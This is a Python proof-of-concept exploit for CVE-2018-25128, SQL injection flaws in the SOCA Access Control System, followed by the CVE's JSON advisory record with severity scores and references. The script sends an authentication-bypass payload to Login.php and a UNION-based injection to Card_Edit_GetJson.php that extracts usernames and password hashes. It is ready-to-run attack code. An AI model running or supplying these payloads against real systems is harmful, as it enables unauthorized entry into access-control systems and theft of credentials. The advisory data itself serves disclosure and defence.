CVE-2018-25128

import requests import sys # CVE-2018-25128 SQL Injection PoC for SOCA Access Control System # Target: Login.php authentication bypass TARGET_URL = "http://target.com/Login.php" def exploit_login_bypass(): """ SQL injection in Login.php to bypass authentication Payload: admin' OR '1'='1' -- """ payload = { 'username': "admin' OR '1'='1' -- ", 'password': 'any' } try: response = requests.post(TARGET_URL, data=payload, timeout=10) if 'Login Failed' not in response.text: print("[+] Authentication bypass successful!") print("[+] Access granted without valid credentials") else: print("[-] Exploitation failed") except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") def exploit_card_edit_sqli(): """ SQL injection in Card_Edit_GetJson.php to extract database data """ target = "http://target.com/Card_Edit_GetJson.php" # Extract password hashes using UNION-based injection payload = { 'card_id': '1 UNION SELECT username,password,3,4,5 FROM users--' } try: response = requests.post(target, data=payload, timeout=10) if response.status_code == 200: print("[+] Data extraction successful!") print(f"[+] Response: {response.text[:500]}") except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") if __name__ == "__main__": print("CVE-2018-25128 SOCA Access Control System SQL Injection") print("=" * 50) exploit_login_bypass() exploit_card_edit_sqli()

{"cve": {"id": "CVE-2018-25128", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:46.383", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOCA Access Control System 180612 contains multiple SQL injection vulnerabilities that allow attackers to manipulate database queries through unvalidated POST parameters. Attackers can bypass authentication, retrieve password hashes, and gain administrative access with full system privileges by exploiting injection flaws in Login.php and Card_Edit_GetJson.php."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "http://www.socatech.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46833", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5519.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5519.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}